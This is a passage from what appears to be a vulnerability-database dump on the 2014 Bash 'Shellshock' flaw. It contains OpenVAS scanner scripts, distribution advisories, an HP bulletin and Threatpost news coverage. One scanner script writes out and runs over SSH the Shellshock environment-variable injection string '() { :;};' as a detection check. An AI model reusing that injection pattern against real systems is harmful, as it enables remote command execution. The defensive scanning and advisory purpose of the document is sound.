Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article linked at the references.\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1293\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020582.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:27", "description": "This host is installed with GNU Bash Shell\n and is 
prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310804490", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804490", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804490\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-26 13:50:37 +0530 (Fri, 26 Sep 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/1207723\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141597\");\n script_xref(name:\"URL\", value:\"https://blogs.akamai.com/2014/09/environment-bashing.html\");\n script_xref(name:\"URL\", value:\"https://community.qualys.com/blogs/securitylabs/2014/09/24/\");\n script_xref(name:\"URL\", value:\"http://www.gnu.org/software/bash/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU 
bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3\");\n\n script_tag(name:\"solution\", value:\"Apply the patch or upgrade to latest version.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! 
sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo 'env x=\"() { :;}; echo CVE-2014-6271 vulnerable\" /bin/bash -c \"echo this is a test\"' | /bin/bash\ncmd = \"echo 'env x=\" + '\"' + '() { :;}; echo CVE-2014-6271 vulnerable\" ' + bash_cmd + ' -c \"echo this is a test\"' + \"' | \" + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"CVE-2014-6271 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-08-16T02:58:23", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain\nmalformed function definitions in the values of environment variables,\nwhich allows remote attackers to write to files or possibly have unknown\nother impact via a crafted environment, as demonstrated by vectors\ninvolving the ForceCommand feature in OpenSSH sshd, the mod_cgi and\nmod_cgid modules in the Apache HTTP Server, scripts executed by unspecified\nDHCP clients, and other situations in which setting the environment occurs\nacross a privilege boundary from Bash execution. NOTE: this vulnerability\nexists because of an incomplete fix for CVE-2014-6271.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1373781>\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-7169>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | It was discovered that a build issue preventing the fix from being applied properly in the 4.3-7ubuntu1.2 package for Ubuntu 14.04 LTS. 
A respin was released to 4.3-7ubuntu1.3 to correct the issue, and USN-2363-2 was published.\n", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "ubuntucve", "title": "CVE-2014-7169", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "UB:CVE-2014-7169", "href": "https://ubuntu.com/security/CVE-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T07:58:57", "description": "GNU Bash through 4.3 processes trailing strings after function definitions\nin the values of environment variables, which allows remote attackers to\nexecute arbitrary code via a crafted environment, as demonstrated by\nvectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and\nmod_cgid modules in the Apache HTTP Server, scripts executed by unspecified\nDHCP clients, and other situations in which setting the environment occurs\nacross a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE:\nthe original fix for this issue was incorrect; CVE-2014-7169 has been\nassigned to cover the vulnerability that is still present after the\nincorrect fix.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | After updates were released for this issue, it was discovered that the fix was incomplete. 
The new issue is being tracked as CVE-2014-7169.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-24T00:00:00", "type": "ubuntucve", "title": "CVE-2014-6271", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-24T00:00:00", "id": "UB:CVE-2014-6271", "href": "https://ubuntu.com/security/CVE-2014-6271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T07:58:38", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function\ndefinitions in the values of environment variables, which allows remote\nattackers to execute arbitrary code or cause a denial of service\n(uninitialized memory access, and untrusted-pointer read and write\noperations) via a crafted environment, as demonstrated by vectors involving\nthe ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules\nin the Apache HTTP Server, scripts executed by unspecified DHCP clients,\nand other situations in which setting the environment occurs across a\nprivilege boundary from Bash execution. 
NOTE: this vulnerability exists\nbecause of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | this issue is mitigated by Florian Weimer's prefix-suffix patch that is included in https://ubuntu.com/security/notices/USN-2364-1 since bash parser vulnerabilities are now limited to specially named environment variables, and as such are no longer directly exposed to CGI scripts, SSH, etc. Once an upstream patch is made available, we will release bash updates, but we don't consider this to be a critical issue requiring immediate attention.\n", "cvss3": {}, "published": "2014-09-27T00:00:00", "type": "ubuntucve", "title": "CVE-2014-6277", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169"], "modified": "2014-09-27T00:00:00", "id": "UB:CVE-2014-6277", "href": "https://ubuntu.com/security/CVE-2014-6277", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T07:53:45", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function\ndefinitions in the values of environment variables, which allows remote\nattackers to execute arbitrary commands via a crafted environment, as\ndemonstrated by vectors involving the ForceCommand feature in OpenSSH sshd,\nthe mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts\nexecuted by unspecified DHCP clients, and other situations in which setting\nthe environment occurs 
across a privilege boundary from Bash execution.\nNOTE: this vulnerability exists because of an incomplete fix for\nCVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | this issue is mitigated by Florian Weimer's prefix-suffix patch that is included in https://ubuntu.com/security/notices/USN-2364-1 since bash parser vulnerabilities are now limited to specially named environment variables, and as such are no longer directly exposed to CGI scripts, SSH, etc. Once an upstream patch is made available, we will release bash updates, but we don't consider this to be a critical issue requiring immediate attention.\n", "cvss3": {}, "published": "2014-09-30T00:00:00", "type": "ubuntucve", "title": "CVE-2014-6278", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2014-09-30T00:00:00", "id": "UB:CVE-2014-6278", "href": "https://ubuntu.com/security/CVE-2014-6278", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hp": [{"lastseen": "2020-10-13T01:01:55", "description": "## Potential Security Impact\nRemote code execution\n\n## VULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP DreamColor Z27x Professional Display running Bash Shell. This is the Bash Shell vulnerability known as \"ShellShock\" which could be exploited remotely to allow execution of code. 
\n\n> note:\n> \n> Only the HP DreamColor Z27x model is vulnerable.\n\n## RESOLUTION\nHP is actively working to address this vulnerability for the impacted product versions of HP DreamColor Z27x Professional Display. The display provides calibration and remote management functionality running on embedded Linux, which includes a bash shell. The shell is not accessible via the standard calibration or remote management interfaces.\n\nThis bulletin will be revised when the firmware update is released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-30T00:00:00", "type": "hp", "title": "HPSBHF03119 rev.3 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2017-07-26T00:00:00", "id": "HP:C04468293", "href": "https://support.hp.com/us-en/document/c04468293", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the 
Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-26T09:03:00", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T09:03:00", "id": "FEDORA:6FC4121113", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3AX2SCLHAVYCZKJMPEA2DHWJWYQ4LT7A/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-27T10:08:26", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: bash-4.3.25-2.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-27T10:08:26", "id": "FEDORA:4A9CF241E0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EXP5O5EQPO5K5TE7KQLQ7GWB3VPY7N4Q/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-26T09:00:48", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T09:00:48", "id": "FEDORA:9FE1722338", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3SE3ICTGVKUWQ7F6WCC5HZKCLEX5DAGX/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. 
", "cvss3": {}, "published": "2014-10-05T08:13:46", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: bash-4.2.51-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-10-05T08:13:46", "id": "FEDORA:652DB21498", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ORGSHHQKKEWJCV3U66TC64Q67KKPGIP6/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:05", "description": "The urgency to patch systems against the [Bash zero-day vulnerability](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>) has been cranked to 10 after reports of an exploit in the wild have been made public by [AusCERT](<https://www.auscert.org.au/20652>), the Computer Emergency Response Team of Australia.\n\nThis seems to reflect a similar finding posted by a researcher who goes by the handle Yinette who found a [malware sample](<https://gist.github.com/anonymous/929d622f3b36b00c0be1>) that points to a bot being distributed by the exploit.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/09/07014510/david_jacoby.jpg>)Other researchers, including David Jacoby of Kaspersky Lab, right and podcast below, and Robert Graham of Errata Security also cautioned that the [Bash vulnerability is wormable](<http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html#.VCP-0fn-OSo>) and that one is inevitable. 
Graham, who built an Internet scanner called Masscan, published early results on a search for vulnerable systems that returned 3,000 vulnerable systems on port 80. He said embedded web servers and other services such as DHCP are in real danger.\n\n\u201cEven though my light scan found only 3000 results, this thing is clearly wormable, and can easily worm past firewalls and infect lots of systems,\u201d Graham wrote, adding that he intentionally limited the scope of the scan which included a ping-home command from vulnerable servers to his server.\n\n\u201cOne key question is whether Mac OS X and iPhone DHCP service is vulnerable \u2014 once the worm gets behind a firewall and runs a hostile DHCP server, that would \u2018game over\u2019 for large networks.\u201d\n\nThe exploit reported by Yinette, meanwhile, has a zero detection rate on [VirusTotal](<https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/>) and has been given the identifier [CVE-2014-6271](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>). Patches were available yesterday from most of the Linux distributions, but already Red Hat has updated an [advisory](<https://access.redhat.com/articles/1200223>) warning that the patch is incomplete and that specially crafted environment variables will execute arbitrary code. A new identifier, [CVE-2014-7169](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>), explains this issue in detail. Red Hat said that it will issue a new patch.\n\n* * *\n\n**PODCAST:** Digital Underground \u2013 David Jacoby on the Bash Exploit\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2014/09/07014512/David-Jacoby-on-the-Bash-Exploit.mp3>\n\n* * *\n\nBash, short for the Bourne again shell, is an embedded command-line shell program present on most Linux, UNIX and Mac OS X systems. 
The problem presented by this vulnerability is that Bash is quietly accessed by various functions, which makes comprehensive patching a massive challenge. The flaw allows an attacker to remotely attach a malicious executable to a variable that is executed when Bash is invoked.\n\n\u201cIt\u2019s super simple and every version of Bash is vulnerable,\u201d Josh Bressers, manager of Red Hat product security, told Threatpost yesterday. \u201cIt\u2019s extremely serious, but you need very specific conditions in place where a remote user would be able to set that environment variable. Thankfully, it\u2019s not common.\u201d\n\nSome of the more critical instances where the vulnerability may be exposed is on Apache servers for example, using mod_cgi or mod_cgid if either of those scripts is written in Bash. The vulnerability can also be used to bypass ForceCommand in sshd configs, Bressers said. ForceCommand is supposed to limit remote code execution, but exploiting this vulnerability sidesteps that protection. Some Git deployments over SSH would be affected here.\n\nThe bug was discovered by Stephane Chazelas, and it has already drawn comparisons to the Heartbleed OpenSSL bug. Like Heartbleed, the danger isn\u2019t in vulnerable web servers that can be easily found and patched, but in any number of software packages on embedded systems and Internet-facing devices.\n\n\u201cUnlike Heartbleed, which only affected a specific version of OpenSSL, this _bash_ bug has been around for a long, long time,\u201d Graham wrote. \u201cThat means there are _lots_ of old devices on the network vulnerable to this bug. 
The number of systems needing to be patched, but which won\u2019t be, is much larger than Heartbleed.\u201d\n", "cvss3": {}, "published": "2014-09-25T11:41:51", "type": "threatpost", "title": "Bash Botnet Exploit Found, Bash Patches Incomplete", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T16:21:47", "id": "THREATPOST:1DED483898A12D8F4397D8C01339AC63", "href": "https://threatpost.com/bash-exploit-reported-first-round-of-patches-incomplete/108550/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:04", "description": "Much like Heartbleed triggered vendors to issue out of band patches to remedy vulnerabilities that popped up earlier this year, Shellshock, the Bash vulnerability, has forced vendors\u2019 hands in a similar fashion.\n\nVirtualization firm VMware issued a progress report on fixes for four different types of products as they relate to the bug on Monday.\n\nFor the most part the company still has its hands full.\n\nAccording to [yesterday\u2019s security advisory](<http://www.vmware.com/security/advisories/VMSA-2014-0010.html>), it\u2019s currently in the middle of developing a patch for all but one of 38 different virtual appliance products, all of which run on Linux and are shipped with an affected version of Bash.\n\nThat leaves vCenter Log Insight 2.0, a cloud-based analytics platform, as the lone Bash-affected product the company has patched so far. [The company posted](<https://my.vmware.com/web/vmware/details?downloadGroup=STRATA20&productId=412&rPId=5804?src=vmw_so_vex_escho_597>) a download link for the patch file, a .PAK called \u201cUpdate 1,\u201d yesterday.\n\nVMware is also prepping a patch for ESX Hypervisor, one of the company\u2019s many pieces of software that runs virtual machines that has an affected version of the Bash shell. Patches for both 4.0 and 4.1 are forthcoming. 
The company did not provide a timeframe for the fix but did claim the patch release would be an exception to its existing VMware lifecycle policy.\n\nA variant of ESX, ESXi \u2014 which uses a different kind of shell, Ash \u2014 is not vulnerable and neither are any of the company\u2019s Windows-based products.\n\nThe company issued an all-encompassing warning about Bash at the end of its advisory, stressing that any unnamed products that may use the Bash shell as part of their operating system could also be vulnerable.\n\nTo mitigate vulnerabilities it\u2019s encouraging users to \u201crestrict access to appliances through firewall rules and other network layer controls to only trusted IP addresses\u201d and deploy patches as they become available.\n\nOnce pushed, the patches should address the handful of attack vectors \u2013 CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187 \u2013 that attackers have been using to exploit Shellshock.\n\nShellshock, a critical remote code execution vulnerability in Bash, first surfaced [a week ago](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>) and over the last several days developers have come to grips with how pervasive it may or may not be throughout their systems.\n\n[Apple was quick](<http://threatpost.com/apple-os-x-safe-by-default-against-bash-vulnerability/108586>) to caution users last week that users\u2019 OSX systems were safe by default while [OpenVPN warned yesterday](<http://threatpost.com/openvpn-vulnerable-to-shellshock-bash-vulnerability/108616>) its servers are 